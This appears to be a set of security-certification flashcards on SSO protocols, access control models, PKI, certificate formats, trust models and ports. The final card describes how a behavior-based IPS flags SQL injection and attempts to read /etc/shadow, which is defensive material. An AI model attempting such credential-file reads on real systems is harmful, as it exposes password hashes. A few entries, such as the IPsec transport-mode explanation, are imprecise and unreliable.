SAML Security Assertion Markup Language (SAML): an XML-based, open-standard data format for exchanging authentication and authorization data between parties, in particular between an Identity Provider and a Service Provider. SAML is also: - a set of XML-based protocol messages - a set of protocol message bindings - a set of profiles (utilizing all of the above). An important case that SAML addresses is web-browser single sign-on (SSO). Single sign-on is relatively easy to accomplish within a security domain (using cookies, for example), but extending SSO across security domains is more difficult and resulted in the proliferation of non-interoperable proprietary technologies. The SAML Web Browser SSO profile was specified and standardized to promote interoperability.
OAuth (short for "Open Authorization"): an open-standard authorization framework that determines what resources a user will be able to access. Used/paired with OpenID. Commonly used as a way for Internet users to log into 3rd-party websites using their Microsoft, Google, Facebook, Twitter, One Network, etc. accounts without giving those websites their password. This authorization framework was developed by Google, Twitter, Facebook, LinkedIn, etc.
OpenID: an open-standard, decentralized authentication protocol (created by the non-profit OpenID Foundation). Allows users to be authenticated by co-operating websites via a 3rd-party identity provider (IdP) service referred to as an OpenID provider (Ex: Facebook, Twitter, Google, etc.), and to log into multiple unrelated websites with ONE SET of CREDENTIALS. Example: logging into Spotify with your Facebook account.
What is Role-Based Access Control? Role-Based Access Control (RBAC): a key characteristic is the use of roles or groups. Instead of assigning permissions directly to users, user accounts are placed in roles/groups and administrators assign privileges to the roles. - Typically mapped to job roles. - Good for high-turnover environments.
ABAC Attribute-Based Access Control (ABAC): access is restricted based on an attribute of the account, such as department, location, login, browser, time of login, or functional designation. - For example, an admin may require user accounts to have the 'Legal' department attribute to view contracts.
Define Rule-Based Access Control. Rule-based Access Control (RBAC): 1. A key characteristic is that it applies global rules that apply to ALL subjects. 2. Access is granted based on RULES or conditions set by the system administrator. These rules can include conditions such as time of day, location, and network connection. Rules within this model are sometimes referred to as restrictions or filters. Basically you are using an Access Control List (ACL) to grant access; this is done on firewalls and routers via the ACL feature. - Example: a firewall uses rules that allow or block traffic for all users equally.
MAC Mandatory Access Control (MAC): a predefined set of strict rules/labels that restrict access to specific resources. They are controlled directly by administrators or a system, restricting the ability of resource owners to grant or deny access to the resource. Key characteristics include: - Centralized management - Strict enforcement - Need-to-know basis - Data confidentiality
DAC Discretionary Access Control (DAC): 1. A type of security access control that grants or restricts object access via an access policy determined by an object's owner group and/or subjects. A key characteristic of the DAC model is that every object has an owner, and the owner can grant or deny access to any other subject (user-based, user-centric). 2. Leaves a certain amount of access control to the discretion of the object's owner, or anyone else who is authorized to control the object's access. The owner can determine who should have access rights to an object and what they should be. - Also governs the ability of subjects to access objects, but it allows users to make policy decisions and/or assign security attributes. DAC is the opposite of MAC in the sense that the USER has the ability to make policy decisions and assign security. Ex: NTFS (New Technology File System).
PAM Privileged Access Management (PAM), aka PIM or privilege management: a comprehensive cybersecurity strategy for exerting control over the elevated ("privileged") access and permissions for users, accounts, processes, and systems across an IT environment. PAM exists to protect against the threats posed by credential theft and privilege misuse, and to control, monitor, secure and audit all human and non-human privileged identities and activities across an enterprise IT environment. Alternatively referred to as privileged identity management (PIM), privileged access security (PAS), or just privilege management, PAM is grounded in the principle of least privilege, wherein users only receive the minimum levels of access required to perform their job functions. Other definitions: a solution that helps protect the privileged accounts within a domain, preventing attacks such as pass-the-hash and privilege escalation. - Native to some cloud identity providers today, and may include a just-in-time elevation feature. - Manages superuser access (Administrator and root). - Stores privileged accounts in a digital vault; access is only granted from the vault by request, and these privileges are temporary. PAM advantages: - Centralized password management - Enables automation - Manage access for each user - Extensive tracking and auditing
Conditional Access: a function that lets you manage people's access to software, apps, files, documents, etc. by setting "conditions". Possible conditions: must be an employee or partner, type of application accessed, geographical location, IP address and network, MFA, device used, browser, operating system (OS). When setting up conditional access, access can be limited to or prevented from the chosen conditions. This way it can be determined that, for example, access is only possible from certain networks or is prevented from certain browsers. - Controls: allow or block, require MFA, provide limited access, require password reset. - Administrators can build complex access rules for complete control over data access. Located under: Azure Portal > Microsoft Entra > Protection > Conditional Access
Filesystem Permissions - relate to Stored Files and the Access to them (Hard drives, SSDs, Flash drives, DVDs) - Filesystem permissions are part of most OSes. Most File Systems include Attributes of files and directories that control the ability of users to read, change, navigate, and execute the contents of the file system. In some cases, menu options or functions may be made visible or hidden depending on a user's permission level; this kind of user interface is referred to as permission-driven. Filesystem Permissions are applied to every File and Folder stored on a volume with the NTFS file system.
Key Management the Management of Cryptographic Keys in a crypto-system / PKI. This includes dealing with Key Generation (aka key creation), Exchange, Storage, Distribution, Use, Revocation, Expiration, crypto-shredding (destruction) and replacement of keys. Key Generation - creating a key with the requested strength using the proper Cipher ---- ---- Key management is the basis of all Data Security. Why? b/c Data is encrypted and decrypted via the use of encryption keys, which means the loss or compromise of any encryption key would invalidate the data security measures put into place. Keys also ensure the safe transmission of data across an Internet connection.
Certificate Authority (CA) - The Entity that issues Certificates to a user. It issues, manages, Validates and can Revoke Certificates. (Considered the Ultimate Authority as it holds the Master Key aka the "Root Key", for signing all certificates that it then hands off to the Intermediary CA.) Certification Authorities are responsible for creating Digital Certificates and own the policies, practices, and procedures for vetting recipients (to verify they are safe) and issuing the certificates. Specifically, the owners and operators of a CA determine: Vetting methods for certificate recipients; Types of certificates issued; Parameters contained within the certificate; Security and operations procedures. A Certificate Authority (CA) can issue multiple certificates in the form of a tree structure. ---- ---- Other Definition: an entity that stores, signs, and issues digital certificates. The certificate issued provides the Ability to Establish a Secure Session. A CA acts as a Trusted 3rd party, trusted both by the subject (owner) of the certificate and by the party relying upon the certificate. Ex: Verisign, Digisign, and many others act as Root CAs. Comodo & Symantec are examples of Public CAs. Public CAs make money by selling certificates. The CA must be Trusted for this to work.
Intermediate CA Intermediate Certificate Authorities (CAs), aka Subordinate CAs, are Certificate Authorities (CAs) that issue certificates off an Intermediate Root. Intermediate Certificates are used as a stand-in for our Root certificate. How the Certificate Chain works: the Root CA issues Certificates to the Intermediate CA. The Intermediate CA issues certificates to Sub CAs. Subordinate CAs issue certificates to the Devices and End users. In smaller organizations, a Root CA may be able to just issue certificates directly to the device or end user, so the other branches may not be needed. They can be used as a proxy because we must keep our root certificate behind numerous layers of security, ensuring its keys are absolutely inaccessible. However, because the root certificate itself signed the intermediate certificate, the intermediate certificate can be used to sign the SSL certificates our customers install and maintain the "Chain of Trust". They do not have "Roots" in the browser's Trust Stores; instead their Intermediate roots chain back to a Trusted 3rd-party root. This is sometimes called cross-signing.
Privileged Access In an enterprise environment, "Privileged access" is a term used to designate special access or abilities above and beyond that of a standard user. Privileged access allows organizations to secure their infrastructure and applications, run business efficiently and maintain the confidentiality of sensitive data and critical infrastructure. Privileged access can be associated with human users as well as non-human users such as applications and machine identities.
Root Program (aka Root Certificate) a root certificate, aka a 'Trusted Root', is a special kind of X.509 digital certificate that can be used to issue other certificates. Root Certificates are at the center of the trust model that undergirds Public Key Infrastructure (PKI), and by extension SSL/TLS. A root certificate is invaluable, because any certificate signed with its private key will be automatically trusted by the browsers. Ergo, you really need to make sure you can trust the Certificate Authority (CA) issuing from it. In this sense it might be helpful to view trust in two specific contexts: 1. Social Trust 2. Technical Trust --------------- ---------------- Every device includes something called a Root store. A root store is a collection of pre-downloaded root certificates (and their public keys) that live on the device itself. Generally, the device will use whatever root store is native to its OS; otherwise it might use a third-party root store via an app like a web browser. There are several major root programs of note: Microsoft, Apple, Google, Mozilla
PKI Public Key Infrastructure (PKI) is: the Entire Framework / System of Technologies used to Request, Create, Manage, Store, Distribute and Revoke Digital Certificates & manage Public-key Encryption. It is based on Asymmetric Encryption. The purpose of a PKI is to facilitate and establish a Secure Communication session between 2 entities, for the electronic transfer of information & for a range of network activities such as e-commerce, internet banking and confidential email. PKI and Public Key Encryption are related but they are NOT the same thing! PKI is the Entire System and just uses Public Key cryptography to Function
RA Registration Authority (RA) is an Authority in a Network that goes through the process of Identifying, Verifying and Authenticating who the Requestor/User is and their request, and ultimately decides if the Certificate should be Signed (Approved) or REVOKED. RAs approve or Revoke Digital certificates and ultimately determine whether the Certificate Authority (CA) should Issue or Revoke the Certificate. - Manages Renewals and Re-Key Requests and Maintains Certifications. - The RA is the Foundation of Trust in this Model
PKI Overview To understand how PKI works, it’s important to go back to the basics that govern encryption in the first place. With that in mind, let’s dive into cryptographic algorithms and digital certificates. The Building Blocks of Public Key Cryptography: 1. Symmetric Encryption 2. Asymmetric Encryption - (creates 2 Cryptokeys - a Public and Private key. Solves exchange problem that plagued Symmetric Encryption). 3. The Role of Digital Certificates in PKI 4. How the Certificate Creation Process Works 5. The CA Hierarchies 6. How Root CA's create Layers of Trust
CRL Certificate Revocation List (CRL) is an Online list of Digital Certificates that the CA (Certificate Authority) has REVOKED. These Certificates are Revoked because they have become Compromised. The Certificate Revocation List (CRL) is a FULL List of EVERY Certificate that has EVER BEEN REVOKED by that CA. CAs are required to publish CRLs, but it's up to certificate consumers if they check these lists and how they respond if a certificate has been revoked.
CN Common Name (CN) the FQDN (Fully Qualified Domain Name) associated with a Certificate. Originally, SSL certificates only allowed the designation of a Single host name in the certificate subject, called the Common Name (CN). This is an important Attribute in a Certificate. If the Common Name does NOT Match the Domain name you will get an Error in your web browser. (Normal Certificate Example Below) Ex: If you're connecting to a site and the CN in the certificate doesn't match the name that you put into your browser or address bar, you'll get a warning saying your connection is NOT private. badssl.com (a website that lists bad certificates) has a number of different error messages so that you can get an idea of what you can expect to see in your browser if any of these errors were to occur.
OCSP Online Certificate Status Protocol (OCSP): A protocol (built into the browser) that allows you to determine the Revocation Status of a Digital Certificate using its Serial Number. It is much faster than CRL. The OCSP message is sent to the OCSP responder. Also considered one of 2 common schemes used to maintain the security of a server and other network resources. An older method, which OCSP has superseded in some scenarios, is known as a certificate revocation list (CRL).
All of a CA’s certificates must be revoked if it is compromised
CSR Certificate signing request (CSR) -- the process of sending a Request to the Registration Authority (RA) informing them that you need a New Certificate.
SAN A Subject Alternative Name (SAN) allows users to specify Additional Host names for a Single (1) SSL certificate. Each of these names will be considered protected by the SSL certificate. A Certificate can be used on Multiple Domain Name Servers that belong to the same Organization, such as using www.google.com or its SAN: google.com. You can also insert other information into a SAN certificate, such as an IP address. In other words, a SAN specifies the Additional Host Names / FQDNs that can be used for a Single SSL Certificate. Other Notes: SAN is becoming the Standard practice for SSL Certificates and will soon replace Common Names (CNs). Ex: (In this example we're looking at the learn.microsoft.com website. Note: The Field Value of this certificate and its listed SANs that it is valid on.)
Expiration The Date a Certificate will Expire OR is No Longer Valid. Recall, Certificates are Valid for a Limited Time Period, from the Date of Issuance, as specified on the Certificate. Note: Current Industry Guidelines on Maximum Certificate Lifetime from widely Trusted CAs is about 1 year or less.
What is the Main Goal of a CA? The main goal of a Certificate Authority (CA) is to verify the Authenticity and Trustworthiness of a Website, Domain and Organization so users know exactly who they're communicating with online and whether that entity can be trusted with their data. When a CA issues a digital certificate for a website, users know they are connected with an official website, not a fake or spoofed website created by a hacker to steal their information or money.
What are the Key Roles of a CA? The Key roles of a Certificate authority (CA): As an integral part of PKI, a CA plays multiple crucial roles: issues Digital certificates; helps establish Trust between Communicating entities over the internet; Verifies Domain Names and Organizations to validate their identities; and maintains the Certificate Revocation List (CRL). Every CA also charges a small fee to complete the verification process and issue a digital certificate following the process explained below
Root Certificate The First Certificate created by the CA (Certificate Authority) that Identifies it. Since a Certificate Authority (CA) can issue multiple certificates in the form of a tree structure, a Root Certificate is the Top-Most Certificate of the Tree, whose private key is used to "sign" other certificates. - A Root SSL certificate is a certificate issued by a Trusted Certificate authority (CA).
A Root SSL Certificate is a certificate issued by a Trusted Certificate authority (CA). True:: T/F
A Certificate Authority (CA) can issue multiple certificates in the form of a tree structure. A Root Certificate is the Top-Most Certificate of the Tree, whose private key is used to "sign" other certificates. True:: T/F
Certificate A Digitally-signed Electronic Document that binds a Public Key with a User's Identity. These certificates commonly use the X.509 standard used for Digital Certificates & PKI
What are the Limitations of a CN compared to a SAN? A Common Name (CN) only allows the designation of a Single host name in the certificate subject, called the Common Name (CN). If the Common Name does NOT Match the Domain name you will get an Error in your web browser. The limitation of a CN is that you can only have 1 Host name in the Certificate (ex: www.google.com), whereas a SAN allows users to specify Multiple Host names for a Single (1) SSL certificate. Each of these names will be considered protected by the SSL certificate. This is why SAN is becoming the Standard practice for SSL Certificates and will soon replace Common Names (CNs)
What Certificate error is this an example of? Common Name (CN)
What is the Purpose of PKI ? PKI governs the issuance of Digital Certificates to Protect sensitive data, Provide unique digital identities for users, devices and applications and Secure end-to-end communications.
Certificate Attributes the attributes that comprise the parts of a Certificate 1. OIDs - Object Identifiers (OIDs) are essentially the Serial numbers, like that on a bank note. OIDs are a sequence of numbers found on the "General Tab". A certificate is identified by its OID. CAs use OIDs to identify a Certificate 2. Issuer -- Identifies the CA that issued the certificate. 3. Validity Dates (expiration) -- certificates contain the "valid to and valid from" dates which assures the certificate will expire at some point. 4. Subject -- identifies the OWNER of the Certificate. 5. Public Key -- RSA Asymmetric Encryption uses the Public Key with the matching Private Key.
OIDs - Object Identifiers (OIDs) are essentially the Serial numbers in the Certificate, similar to that on a bank note. OIDs are a sequence of numbers found on the "Details Tab" of a certificate.
A certificate is identified by its OID. CA's use OID's to identify a Certificate. True:: T / F
Where are OID's located at in the Certificate Tab?
Wildcard Certificate Begins with an Asterisk (*) and can be used for Multiple Domains, but each Domain Name must have the same ROOT Domain. Basically, this certificate Allows ALL of the Subdomains to use the Same Public Key Certificate and have it displayed as Valid. Ex: Google uses a Wildcard Certificate to issue *.google.com -- the same certificate can be used for: accounts.google.com, support.google.com, etc
Subject alternative name (SAN) Certificate used for Multiple domains that use Different names. A Subject Alternative Name (SAN) allows users to specify Additional Host names for a Single (1) SSL certificate. Each of these names will be considered protected by the SSL certificate. A Certificate can be used on Multiple Domain Name Servers that belong to the same Organization, such as using www.google.com or its SAN: google.com. You can also insert other information into a SAN certificate, such as an IP address. In other words, a SAN specifies the Additional Host Names / FQDNs that can be used for a Single SSL Certificate. Other Notes: SAN is becoming the Standard practice for SSL Certificates and will soon replace Common Names (CNs). Ex: (In this example we're looking at the www.google.com website. Note: The Field Value of this certificate and its listed SANs that it is valid on.)
Code Signing Certificate the process of Authenticating Software Code / Applications / Programs / Scripts to confirm their Source of Origin, such as the Author / Publisher, using a Certificate or Cryptographic Keys. This Certificate verifies: - Software / Code Author Validation - Authentication of Code - Provides Cryptographic Protection. Windows, Linux, and MacOS will alert you if you download Software that is not Code Signed or is from an Unknown Publisher.
Self-Signed Certificate a self-signed certificate is issued by the Same Entity that is using it. - It is NOT issued by a Trusted CA. - Instead, Private CAs within an Organization generate these Self-signed certificates. By Default they're NOT Trusted. However, Administrators can place Copies of the Private CA's Self-signed certificates in the Trusted Root CA Folder on Corporate Computers. - However, it does NOT have a CRL and cannot be Validated or Trusted.
Machine / Computer Certificate a Certificate issued to a Device or a Computer, it is used to identify a computer within a domain
Email Certificate The 2 uses of e-mail certificates are for: 1. Encryption of Email 2. Digital Signatures
User Certificates used to represent a user's Digital Identity. In most cases, a User Certificate can be Mapped back to a User Account. A user certificate provides Authenticity to a user for the Applications that they use.
Root Certificate (review) A Root Certificate is a Trust Anchor in a PKI environment from which the whole chain of Trust is derived; this is the main certificate of the Root CA, found at the top of the Hierarchy.
DV a Domain Validation Certificate is an X.509 certificate that proves the Ownership of a DNS Domain Name.
Extended Validation (EV) provides a Higher level of Trust in Identifying the Entity that is using the Certificate. Normally seen on the Financial Sector's Websites. Note: EV certificates can be issued only by a subset of CAs and require verification of the requesting entity's legal identity before certificate issuance. (the green padlock and the Entity's company name listed are the Extended Validation in this certificate)
Certificates consists of how many Keys? 2 Keys: a Public & Private key. Without one, you don't have a valid certificate. Certificates are NOT Whole without the Private Key.
Certificate Format Overview here
X.690 uses BER, CER, and DER for Encoding True:: T/F
BER Basic Encoding Rules (BER) -- the Original Ruleset governing the Encoding of Data Structures for Certificates where several different Encoding Types can be Utilized.
CER Canonical Encoding Rules (CER) -- the Restricted Version of BER that only Allows the use of 1 Encoding Type. Can use Both: DER BINARY Format OR ASCII Format Certificate. Extensions can include: .cer, .crt
DER Distinguished Encoding Rules (DER) is another Restricted Version of BER which allows only 1 Encoding Type & has MORE Restrictive Rules for Length, Character Strings, & how Elements of a Digital Certificate are Stored in X.509. Its Format is Designed as a Transfer syntax for Data Structures. Considered a Common Format and is even used with Java Certificates. DER is a BINARY FILE. Certificate Extensions may be saved as .der, .cer, .crt (DER is on the Test)
PEM Privacy enhanced mail (PEM) -- a Filetype used for Digital Certificates for Privacy enhanced mail -- uses the DER encoding Method. Uses ASCII file format. May also be stored with these extensions: .pem, .cer, .crt, or .key
P12 Public Key Cryptographic System # 12 (aka PKCS#12 Certificate) used to store a Server Certificate, Intermediate Certificate & a Private Key in one Encrypted file. The filetype is stored as a .p12 file - used as a Container Format to hold many Certificates. May store many X.509 certificates in a single .p12 or .pfx file. - May be used to transfer a Public or Private Key PAIR. - Can be Password Protected. - Derived from Microsoft's Extended Personal Information Exchange (PFX) format. Both PFX and .p12 files are 2 very similar formats that are referenced interchangeably.
PFX Personal Information Exchange (PFX) -- used by Microsoft for release signing. Precursor to the P12 format. (essentially, the OLDER VERSION of P12) This file will contain BOTH the Private & Public keys. Filetype: .pfx.
P7B Public Key Cryptographic System # 7 (aka PKCS#7) used for the Basis of S/MIME -- the Secure Protocol and SSO (Single Sign On). Files are DER Based (ASCII) and use .p7b. ASCII format used to share Public Keys
On the Test, a good tip is to Remember that all of these Filetypes are Associated with PKI in General True:: T/F
Certificates are usually stored as Binary Files or ASCII files aka Encoded Files. True:: T/F
X.509 Certificates are the STANDARD used for Digital Certificates. True:: T/F It allows us to move these certificates between different systems.
Online vs. offline CA: An Online CA (Certificate Authority) is ALWAYS Running / operating (meaning the computer is on). An Offline CA is Kept Offline except for Specific Renewal & Issuance operations. Offline CA is considered Best Practice.
Offline CA is NOT considered Best Practice False:: T/F Offline CA IS Best Practice. -- CAs run on Computer Servers. The Safest Computer server is one that is turned off and disconnected from the Internet
X.509:: What Certificate Format? is the Standard used for PKI for digital certificates and contains the owner/user’s information and the certificate authority’s information.
Stapling is a method used when the Web Server bypasses the CRL and instead uses OCSP (Online Certificate Status Protocol), which allows the Web Server to provide the Validity of its OWN Certificate. This is performed by the Web Server, which essentially Downloads the OCSP response from the Certificate Vendor in Advance and Provides it to Browsers without their going back to the OCSP endpoint. aka OCSP Stapling.
Certificate Validity can only be done by the CRL or OCSP.
OCSP Stapling uses OCSP (Online Certificate Status Protocol), which allows the Web Server to provide the Validity of its OWN Certificate.
Pinning is a method designed to mitigate & prevent the use of FRAUDULENT X.509 Certificates, Compromised CAs, & Man-in-the-middle attacks. Once a Public Key or Certificate has been seen for a Specific Host, that Key or Certificate is Pinned TO the Host. aka Certificate Pinning
Certificate Pinning prevents the compromising of CAs, Certificate Fraud, & SSL Man-in-the-middle attacks.
The 4 Types of Trust Models are Bridge, Hierarchical, Hybrid and Mesh.
a Trust Model is a model of how different Certificate Authorities Trust Each Other and how their clients will Trust Certificates from OTHER Certification Authorities (CA's)
Key Escrow holds the Private Keys for 3rd parties and stores them in the Hardware Security Module (HSM). Addresses the possibility that a Cryptographic Key may be lost. The concern is usually with Private or Asymmetric Keys. If this occurs, there is NO way to get the key back and the user can NOT Decrypt messages. So, in order to protect against this scenario, Organizations establish KEY ESCROWS to enable Recovery of LOST KEYS. Key Escrows hold the private keys stored in the HSM
addresses the possibility of a Cryptographic Key becoming lost. The concern is usually with Private or Asymmetric Keys. If this occurs, there is NO way to get the key back and the user can NOT Decrypt messages. So, in order to protect against this scenario occurring, Organizations establish KEY ESCROWS to enable Recovery of LOST KEYS. Key Escrows hold the private keys and store them in the HSM
Certificate Chaining refers to the fact that Certificates are handled by a CHAIN / WEB of Trust. Example: You purchase a Digital Certificate from a CA, so you Trust that CA's Certificate and in turn, that CA Trusts a ROOT Certificate.
HSM (Hardware Security Module) is a piece of Hardware or a Portable Device attached to the server to Store Keys.
If a user can NOT access their Data because their Private Key is corrupted, a DRA (Data Recovery Agent) will recover the Data. The DRA needs to get the Private key from the Key Escrow.
a method of storing important cryptographic keys. Each key is stored in a system that is tied to the original user and subsequently encrypted for security purposes. Key Escrow
a hardened, tamper-resistant hardware device that strengthens encryption practices by generating keys, encrypting and decrypting data, and creating and verifying digital signatures is called a Hardware Security Module (HSM)
An ordered list of certificates, containing an SSL/TLS Certificate and Certificate Authority (CA) Certificates, that enables the receiver to verify that the sender and all CAs are trustworthy. The chain / path begins with the SSL/TLS certificate, and each certificate in the chain is signed by the entity identified by the next certificate in the chain. This is called the Certificate Chain
What is this an example of? Certificate Chain -- Illustration of a certification path from the Certificate Owner to the Root CA, where the chain of trust begins
made up of a list of certificates that starts from a server's certificate and terminates with the root certificate. If your server's certificate is to be trusted, its signature has to be traceable back to its root CA. In the certificate chain, every certificate is signed by the entity that is identified by the next certificate along the chain. This is known as a Certificate chain (or Chain of Trust)
Links in the Certificate Chain 1. Root CA Root CAs (called "trust anchors" in X.509 terminology) hold the highest position in the trust tree and are recognized by all clients (browser/OS) at all levels. Root CAs are responsible for identifying intermediate CAs and verifying their trustworthiness. The root CA uses its certificate's private key to sign the certificates of the intermediate CAs (or, in the case of unchained certificates, the server certificate) under it. The trustworthiness of the root CA is thus "passed down" to the intermediate CAs; any CA that is validated by the root CA is automatically trusted by its clients. 2. Intermediate CA The intermediate CA, aka Subordinate CA, is the "middle-man" between the root and server certificates. The intermediate CA certificates are either signed by the root CA, or by another intermediate CA certificate signed by a root CA. The intermediate certificate, in turn, signs the server certificate. There is often one, or more, intermediate CA certificate in a chain. For the server certificate to be compatible with all its clients, the intermediate certificate has to be installed on the server. If not, it might prevent some browsers, mobile devices, applications, etc. from trusting the server certificate. 3. Server Certificate This is the certificate that is publicly issued to a server for the specific domains that the user needs authorization for. The server certificates are signed by the intermediate CA, and can be traced back to the root CA. When the Chain of Trust is verified, the client makes a secure connection with the server.
is a collection of rules that informs applications on how to decide the legitimacy of a Digital Certificate. Trust Models
Web of Trust Model is a term used in cryptography to describe decentralized security models in which participants authenticate the identities of other users. Web of trust is a concept used in PGP, GnuPG, and other OpenPGP-compatible systems to establish the authenticity of the binding between a public key and its owner [3]. Its decentralized trust model is an alternative to the centralized trust model of a public key infrastructure (PKI), which relies exclusively on a certificate authority (or a hierarchy model of such). In this type of system each user creates and signs certificates for the people he or she knows. Therefore, no central infrastructure needs to be developed. The web-of-trust model differs greatly from the hierarchical model. The hierarchical model is easily represented with computers as an inverted tree, but the web-of-trust more closely relates to how people determine trust in their own lives. The system allows users to specify how much trust to place in a signature by indicating how many independent signatures must be placed on a certificate for it to be considered valid
Which Trust Model does this Represent? Hierarchical Model -- uses a Hierarchy from the Root CA down to the Intermediary to End User. This is the Normal PKI model.
What Trust Model does this Represent? Hierarchical Model
What is a Bridge Trust Model? Considered a type of Trust Model. Defined as a Peer-to-Peer Relationship that exists between the Root CAs. Each of the Root CAs Can Communicate with each other, allowing Cross Certification. It is possible to have a Single CA, aka "The Bridge CA", be the Central Point of Trust. This allows a Certification Process to be Established between Organizations or Departments. Each of the Intermediate CAs Trusts only the CAs Above & Below it, but the CA structure can now be expanded without creating Additional Layers of CAs.
What Type of Trust Model is this? Bridge Trust Model
(DNS) ? What Port does it use? DOMAIN NAME SYSTEM (DNS) a hierarchical naming system that resolves a Hostname to an IP address. uses PORT: 53
(POP v3) Post Office Protocol (POP 3) is an Email Protocol that works by contacting your email service and downloading all of your new messages from it. Once they are downloaded onto your PC or Mac, they are deleted from the email service. This means that after the email is downloaded, it can only be accessed using the same computer. If you try to access your email from a different device, the messages that have been previously downloaded won't be available to you. Sent mail is stored locally on your PC or Mac, not on the email server. A lot of Internet Service Providers (ISPs) give you email accounts that use POP uses Port: 110 (TCP)
IMAP Internet Messaging Access Protocol (IMAP) allows you to access your email wherever you are, from any device. (this IMAP is the unsecured version of IMAP) When you read an email message using IMAP, you aren't actually downloading or storing it on your computer; instead, you're reading it from the Email Server. As a result, you can check your email from different devices, anywhere in the world. IMAP only downloads a message when you click on it, and attachments aren't automatically downloaded. This way you're able to check your messages a lot more quickly than POP. PORT: 143
Incoming Mail (IMAP) Server is written as : imap..com
Incoming (POP) Server is written as : pop..com
Outgoing Mail (SMTP) Server is written as : smtp..com
(SSL / TLS ) Protocol that Secures Data in Transit Uses Port: 443 (just like HTTPS) Note: SSL was retired in 2015. TLS is the upgraded / superior replacement
Overview of Protocols, Ports, and Use Cases
Difference between IPSec Tunnel mode vs Transport Mode The main difference in Transport mode is that it retains the original IP header. In other words, payload data transmitted within the original IP packet is protected, but not the IP header. In Transport mode, encrypted traffic is sent directly between two hosts that previously established a secure IPsec tunnel.
WAF Web Application Firewall (WAF) A specific form of an Application Firewall that Filters and Monitors HTTP traffic between the Internet and the Web Application. This is how it Protects Web Applications. Typically protects Web apps from XSRF, XSS, CSRF, SQL injection, etc. (some come preconfigured with OWASP rules) Ex: AWS WAF, Azure Web Application Firewall, Imperva Web Application Firewall (WAF), Azure Application Gateway, Cloudflare WAF
(IDS) Intrusion Detection System (IDS): Software or Hardware that Analyzes and Scans Whole Packets, (both the Header and the Payload), searching for known events. Once a Known-Event is Detected, it generates a Log Message. (Focuses on Alerting and Notification).
(IPS) Intrusion Prevention System (IPS) Software or Hardware that Analyzes and Scans Whole Packets, (both the Header and the Payload), searching for known events. Once a Known-Event is Detected, it REJECTS the Packet. (Focuses on Action / Rejecting).
LDAP (LDAP) Lightweight Directory Access Protocol (not encrypted) used for Directory Services Information. (ex: Active Directory Domain Services) uses Port: 389 uses: TCP & UDP
NTPsec Network Time Protocol Secure (NTPsec) used to synchronize computers TIME to Internet time Servers Default Port: 123 uses UDP
Behavior-Based (IDS & IPS) Behavior-based IPS technology will alert if a particular type of bad behavior occurs. For example, a URL with an apostrophe and a SQL command would indicate a SQL injection, and someone trying to view /etc/shadow would indicate an attempt to gain access to a protected part of the file system. This is universally considered to be bad behavior, and it would be flagged by a behavior-based IPS.